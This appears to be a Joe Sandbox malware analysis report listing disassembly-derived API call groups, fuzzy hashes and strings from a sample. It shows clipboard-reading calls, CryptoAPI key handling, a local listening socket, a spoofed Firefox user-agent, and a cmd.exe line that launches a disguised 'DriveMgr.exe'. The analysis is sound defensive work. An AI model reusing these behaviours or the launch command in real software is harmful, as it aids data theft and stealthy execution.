              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: htons$bindclosesocketgetsocknamehtonllistenmemmovesetsockoptsocket
              • String ID: 127.0.0.1:%hu$http://127.0.0.1:%hu
              • API String ID: 1977552280-2042925195
              • Opcode ID: 23926f9b41b2e7e8f6b612ddbd7183bb62599e3425086346f3cbe9198c31ad11
              • Instruction ID: 6c3a73292dc7561bf0aff66f8963e5cf7acb267610f6d4505f1e977d8f3d2e08
              • Opcode Fuzzy Hash: 23926f9b41b2e7e8f6b612ddbd7183bb62599e3425086346f3cbe9198c31ad11
              • Instruction Fuzzy Hash: 0541A2B1A34308AFDB10DFA0DE49FBE7779AF44711F008608F6519A2D1E7B19904EBA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • OpenClipboard.USER32(00000000), ref: 009AFCD8
              • GetClipboardData.USER32(00000001), ref: 009AFCE4
              • GlobalLock.KERNEL32(00000000), ref: 009AFCF7
              • GlobalUnlock.KERNEL32(00000000), ref: 009AFD0A
              • GetClipboardData.USER32(0000000D), ref: 009AFD1E
              • GlobalLock.KERNEL32(00000000), ref: 009AFD31
              • GlobalUnlock.KERNEL32(00000000), ref: 009AFD44
              • CloseClipboard.USER32 ref: 009AFD56
              • Sleep.KERNEL32(000000C8), ref: 009AFD61
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: ClipboardGlobal$DataLockUnlock$CloseOpenSleep
              • String ID:
              • API String ID: 4265195717-0
              • Opcode ID: 301be675a4762150529b67da1ede8732fee11c3cd164cc40cc34c1843e824d30
              • Instruction ID: e32cf6586aca5ebf910fa2ba79be3873391358b7eb2759f37474980878d6e5cd
              • Opcode Fuzzy Hash: 301be675a4762150529b67da1ede8732fee11c3cd164cc40cc34c1843e824d30
              • Instruction Fuzzy Hash: 3E11A1B4904308EFDB00FFF0EA4DB8D7BB8AF46311F144664E506972A0D7348A84EB90
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F
              • memmove.MSVCRT ref: 009A2194
              • CryptAcquireContextA.ADVAPI32(009BA014,00000000,?,0000000D,F0000000), ref: 009A21DE
              • CryptAcquireContextA.ADVAPI32(009BA11C,00000000,?,00000018,F0000000), ref: 009A21FA
              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 009A2223
              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 009A223C
              Strings
              • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 009A2148
              • Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider, xrefs: 009A215B
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: ContextCrypt$AcquireReleasememmove
              • String ID: Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider$Microsoft Enhanced RSA and AES Cryptographic Provider
              • API String ID: 2654783079-2824478982
              • Opcode ID: fe0537fdb452e675ec7a406bd0f20d27d123ad4dc3aafc57e4d9f0099345da87
              • Instruction ID: 08799e8c943f12a32dc711dc916bf75c66e4598123f35bbd1e7c32635d694798
              • Opcode Fuzzy Hash: fe0537fdb452e675ec7a406bd0f20d27d123ad4dc3aafc57e4d9f0099345da87
              • Instruction Fuzzy Hash: E4210D74B8C3046AEB60B758AD17FE977245BB3B14F044154FA44651C2EAF1164C97E3
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • memmove.MSVCRT ref: 009A2BC6
              • memmove.MSVCRT ref: 009A2BE1
                • Part of subcall function 009A22B0: CryptGenRandom.ADVAPI32(?,009A2BFD,009AA356,?,009A2BFD,009AA356,00000080), ref: 009A22C2
              • CryptImportKey.ADVAPI32(?,009AA466,00000190,00000000,00000001,?), ref: 009A2C1F
              • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000290), ref: 009A2C45
              • CryptDestroyKey.ADVAPI32(?), ref: 009A2C79
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: Crypt$memmove$DestroyExportImportRandom
              • String ID:
              • API String ID: 2808701524-0
              • Opcode ID: 97bd3c55830984941563fa4decd0bcbad362e322591b91f3403e50d1e0aed37c
              • Instruction ID: d04da4034cd9cde2158e3821292f157c781ebc66b4fda824890c22acf615b529
              • Opcode Fuzzy Hash: 97bd3c55830984941563fa4decd0bcbad362e322591b91f3403e50d1e0aed37c
              • Instruction Fuzzy Hash: 4531D374600208AFEB10DF64CC86FDA7B75AF95714F04C188FA486B2C2DA75EA848BD5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • memcpy.MSVCRT ref: 009AFDDF
              • memcpy.MSVCRT ref: 009AFDF3
              • CryptImportKey.ADVAPI32(015379A0,00000008,0000001C,00000000,00000000,00000000), ref: 009AFE17
              • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?), ref: 009AFE3D
              • CryptDestroyKey.ADVAPI32(00000000), ref: 009AFE50
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: Crypt$memcpy$DestroyEncryptImport
              • String ID:
              • API String ID: 774555595-0
              • Opcode ID: 9f821606d236ac1f72a7ee2bf2616eeeb4fe106cdf5724cdc3337573ff5902ce
              • Instruction ID: ec2a976c3d458394c8dbc897e5b6bf7c3c475280e214f8d80133055ac72380a6
              • Opcode Fuzzy Hash: 9f821606d236ac1f72a7ee2bf2616eeeb4fe106cdf5724cdc3337573ff5902ce
              • Instruction Fuzzy Hash: 083149B1D14209EFDB00CFE8C941BEEBBB4AF48700F008159EA19B7280D7749A04DBA5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • memmove.MSVCRT ref: 009A26B0
              • CryptImportKey.ADVAPI32(?,00000008,0000001C,00000000,00000000,?), ref: 009A26CD
              • CryptSetKeyParam.ADVAPI32(?,00000004,00000002,00000000), ref: 009A26F0
              • memmove.MSVCRT ref: 009A270D
              • CryptDestroyKey.ADVAPI32(?,?,00000004,00000002,00000000), ref: 009A274F
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: Crypt$memmove$DestroyImportParam
              • String ID:
              • API String ID: 4072243228-0
              • Opcode ID: 430c5801c87089e0e2858298fb4256053efd360186146b5881fbe49fd5c90600
              • Instruction ID: 4eb32af77c95339b645258431ea0c523012d66e0cb7a665cdae07111d0c63b9a
              • Opcode Fuzzy Hash: 430c5801c87089e0e2858298fb4256053efd360186146b5881fbe49fd5c90600
              • Instruction Fuzzy Hash: 1F21A374A54348ABEB10DFA4CC45FEE7BB8AF99300F048508F9496B281D775EA44DBE1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • memmove.MSVCRT ref: 009A2CB0
              • CryptImportKey.ADVAPI32(?,?,00000190,00000000,00000001,?), ref: 009A2CED
              • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000290), ref: 009A2D1C
              • CryptDestroyKey.ADVAPI32(?), ref: 009A2D5D
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: Crypt$DestroyExportImportmemmove
              • String ID:
              • API String ID: 1806151904-0
              • Opcode ID: a88ffb5ff215d3a97cdc0168d96815dfefa2d5b2803c5a7a13f0bb9b77c01302
              • Instruction ID: b636894780f6662848ab557b7e435dd029afe4537d8d0bc0cd19bb92bef39238
              • Opcode Fuzzy Hash: a88ffb5ff215d3a97cdc0168d96815dfefa2d5b2803c5a7a13f0bb9b77c01302
              • Instruction Fuzzy Hash: 01219671A106186FEB30DB64DC4AFEA7778AF4A701F0442C8F60DAA1C1D6709B848FA4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CryptHashData.ADVAPI32(000001FD,00000000,?,00000000,000001FD), ref: 009A2A08
              • CryptDuplicateHash.ADVAPI32(000000FF,00000000,00000000,000000FF), ref: 009A2A1E
              • CryptGetHashParam.ADVAPI32(000000FF,00000002,?,?,00000000), ref: 009A2A38
              • CryptDestroyHash.ADVAPI32(000000FF), ref: 009A2A4B
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CryptHash$DataDestroyDuplicateParam
              • String ID:
              • API String ID: 1241924263-0
              • Opcode ID: 1a4e95e64d694122503c9ae5d91bcff136f578f46d33b44b67a1ebf25472f71f
              • Instruction ID: 48cfeb7e1aeace739a35ece8c48e83b86374731ab643d2e34f436b4122a4d19d
              • Opcode Fuzzy Hash: 1a4e95e64d694122503c9ae5d91bcff136f578f46d33b44b67a1ebf25472f71f
              • Instruction Fuzzy Hash: 1B014B79654208BBDB10DFA4DD46FAF7BB9AB49700F008258FE09DB280D671DA00DBA1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CoCreateInstance.OLE32(009B77A4,00000000,00000017,009B7784,00000008,shell32.dll,00000008), ref: 009B0948
              Strings
              • %windir%\system32\cmd.exe, xrefs: 009B0956
              • /c start __ & __\DriveMgr.exe & exit, xrefs: 009B098F
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CreateInstance
              • String ID: %windir%\system32\cmd.exe$/c start __ & __\DriveMgr.exe & exit
              • API String ID: 542301482-2643104863
              • Opcode ID: 6a9616e3886c0c9b6f41a448b8febad325717910a0ebf9b2820558e90fd841c0
              • Instruction ID: 51c101e78886b79c1f12c0ab8106d2c7265e1ccf74e5dcb62d49f2f7cfa51d78
              • Opcode Fuzzy Hash: 6a9616e3886c0c9b6f41a448b8febad325717910a0ebf9b2820558e90fd841c0
              • Instruction Fuzzy Hash: EF21E879700109EFC704DF98D981D9EB3B9AF8C704F204298E6099B3A0DA71BE41DB90
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CryptImportKey.ADVAPI32(?,558DF345,?,00000000,00000040,?,009A254A,?,009A2593), ref: 009A2446
              • CryptGetKeyParam.ADVAPI32(00000004,00000009,?,00000004,00000000,?,00000000,00000040,?,009A254A,?), ref: 009A2469
              • CryptDestroyKey.ADVAPI32(00000000,?,00000000,00000040,?,009A254A,?), ref: 009A248F
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: Crypt$DestroyImportParam
              • String ID:
              • API String ID: 4196615532-0
              • Opcode ID: 3441bc6fad306d026f785a475d61cd584a30a8aabe0d264bfcd5f0c006d51a69
              • Instruction ID: 4311cbc9953dde1831638d9c94ad8bc1237b8c41afcbcd44b0c61c74f28721eb
              • Opcode Fuzzy Hash: 3441bc6fad306d026f785a475d61cd584a30a8aabe0d264bfcd5f0c006d51a69
              • Instruction Fuzzy Hash: 56118274714208BFDB00DFA4C995FAEBBB9AB49310F008288F945DB290D6309A00DBE1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,00000000,009AA487,?,009A2A8B,009AA487,?,00000000,00000000,?,009AA487), ref: 009A298B
              • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 009A29B1
              • CryptDestroyHash.ADVAPI32(00000000,?,009A2A8B), ref: 009A29D4
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CryptHash$CreateDataDestroy
              • String ID:
              • API String ID: 1679088875-0
              • Opcode ID: c669883480d9615a6f7f3f36e4d22063f71dda041f24a60eec299d2b81bc150b
              • Instruction ID: 377400cfd5f3cad2bace80d9662fbb3e1313bed86f5fb0c936d76a65416d23c9
              • Opcode Fuzzy Hash: c669883480d9615a6f7f3f36e4d22063f71dda041f24a60eec299d2b81bc150b
              • Instruction Fuzzy Hash: A0118070648349AFDB14CFA8D954BAF7BA8AB4A704F044248F949CB280C276D945CBE1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 009A3330: HeapAlloc.KERNEL32(00000000,00000008,?), ref: 009A3370
                • Part of subcall function 009A3330: HeapReAlloc.KERNEL32(00000000,00000008,00000000,?), ref: 009A338E
                • Part of subcall function 009A3330: Sleep.KERNEL32(000007D0), ref: 009A33A2
                • Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F
              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 009A3D9B
              Strings
              • Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:72.0) Gecko/20100101 Firefox/72.0, xrefs: 009A3CCE
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: AllocHeapTime$FileSleepSystemmemmove
              • String ID: Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:72.0) Gecko/20100101 Firefox/72.0
              • API String ID: 734550395-1181690960
              • Opcode ID: 48849f2c87fc65cf1e714792af8feaa121f318908bbb54c0d3fc61d5f9f14a5d
              • Instruction ID: 5fc4bbb150ebfa979646d8f9317017a67bd3954830ad1ed632e3075c04fa5f98
              • Opcode Fuzzy Hash: 48849f2c87fc65cf1e714792af8feaa121f318908bbb54c0d3fc61d5f9f14a5d
              • Instruction Fuzzy Hash: F94122B19282189BCB10EB20EE06BD977B8BF85714F04C294F749662D1DB718644CFE1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • memmove.MSVCRT ref: 009A25F1
              • CryptEncrypt.ADVAPI32(00000010,00000000,00000000,00000000,009A27FC,00000010,00000010,?,?,?,?,009A2814), ref: 009A2612
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CryptEncryptmemmove
              • String ID:
              • API String ID: 2839943772-0
              • Opcode ID: cb8e1f83ee8e9b6949df0425192019a912a4ba70f2320d497e36b90bb72a0f94
              • Instruction ID: 11a9a4991b0c354ccb7b339fa76ad68ac049d58334d63f1c42eb3b714d2fc675
              • Opcode Fuzzy Hash: cb8e1f83ee8e9b6949df0425192019a912a4ba70f2320d497e36b90bb72a0f94
              • Instruction Fuzzy Hash: CF217230904208ABDB00CF5CC855F9DBB759F51308F18C499ED496B382C6B6A694DBD5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CryptReleaseContext.ADVAPI32(?,00000000,?,009AE9E4), ref: 009A2264
              • CryptReleaseContext.ADVAPI32(?,00000000,?,009AE9E4), ref: 009A227C
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: ContextCryptRelease
              • String ID:
              • API String ID: 829835001-0
              • Opcode ID: 4f536dc2fb3414926706e2b9a078eba2fcdc7656a8e51077fbd0bcf744f012e6
              • Instruction ID: 6c02ad55c809e7868cc6b10272ad4f3e44e135b3abd4757c742a8b2d6b16ac93
              • Opcode Fuzzy Hash: 4f536dc2fb3414926706e2b9a078eba2fcdc7656a8e51077fbd0bcf744f012e6
              • Instruction Fuzzy Hash: DBF0A03012C300DBD318AB5CEE5ABA13368B326721F400304F216461F0C7759880EBD2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • LoadLibraryA.KERNEL32(00000000), ref: 009A9041
              • GetProcAddress.KERNEL32(00000000,?), ref: 009A9058
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: AddressLibraryLoadProc
              • String ID:
              • API String ID: 2574300362-0
              • Opcode ID: 409998da0ec11f9ba0ec9bea68cc038c074d5ac3747eef48446b5bcbf3a642a0
              • Instruction ID: d21bfaebb7105c76fdc7557c5fdaba71b3d1e877bc36d37bbff1b2d2e893eff4
              • Opcode Fuzzy Hash: 409998da0ec11f9ba0ec9bea68cc038c074d5ac3747eef48446b5bcbf3a642a0
              • Instruction Fuzzy Hash: 58F0377491420CEFCB00EFA8D94879D7BB4FB09325F108254E90997350D3315A84DB90
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000040,00000000,?,00000000,00000000,?,009AB263,?,00000000,00000056,00000080), ref: 009A23E2
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CryptEncrypt
              • String ID:
              • API String ID: 1352496322-0
              • Opcode ID: ebef8bda2f090fdbb07912d0b28d6f0250db375b3ac84d5db00235956aca2450
              • Instruction ID: 2a13c16d7e348ba4318d491c51ce09f21b405d3ea0ad8cf56318f6db330d44a0
              • Opcode Fuzzy Hash: ebef8bda2f090fdbb07912d0b28d6f0250db375b3ac84d5db00235956aca2450
              • Instruction Fuzzy Hash: 6BF04FB5208348AFCB04CF98D880FAA37B9AF89710F048148FD189B350D631E915CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CryptDestroyKey.ADVAPI32(?,?,009A99C6,?,?,?,?), ref: 009A2901
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CryptDestroy
              • String ID:
              • API String ID: 1712904745-0
              • Opcode ID: dfb6108635e72e122e244cc1f138391789e46308d8b44a9ee442889792a3453e
              • Instruction ID: b4dfbdf21dc4ddfd7ba2d70958de7d6a495623181a57431861bd7c2fec3ebf9d
              • Opcode Fuzzy Hash: dfb6108635e72e122e244cc1f138391789e46308d8b44a9ee442889792a3453e
              • Instruction Fuzzy Hash: 9AD05E3914430CABCB009F98E845F99376CAB85B15F408414F9084F250CB31F980CBE0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CryptDestroyKey.ADVAPI32(?,?,009AB2C4,?), ref: 009A25B1
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CryptDestroy
              • String ID:
              • API String ID: 1712904745-0
              • Opcode ID: 1d71279c49288a24718170516c5efa348d69ea4dc13950002c436edf0f2f5910
              • Instruction ID: 20c6c0b9d695d1312523e9afbc59184ef669fe253a2da7d097a26e3e47c66e4a
              • Opcode Fuzzy Hash: 1d71279c49288a24718170516c5efa348d69ea4dc13950002c436edf0f2f5910
              • Instruction Fuzzy Hash: 63D05E75540308EBCB00DF98D845F59376CAB45704F408010FA084F254DB31F980CBE0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CryptGenRandom.ADVAPI32(?,009A2BFD,009AA356,?,009A2BFD,009AA356,00000080), ref: 009A22C2
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CryptRandom
              • String ID:
              • API String ID: 2662593985-0
              • Opcode ID: c40706bca5d4e14b35deb460e56c01fa32e3d7b65d6f5b3095e25b28bf9a2232
              • Instruction ID: e82aa0396394a1b094cbbe3696aff278a3d2363a7906dd843dfef83c09cd7d10
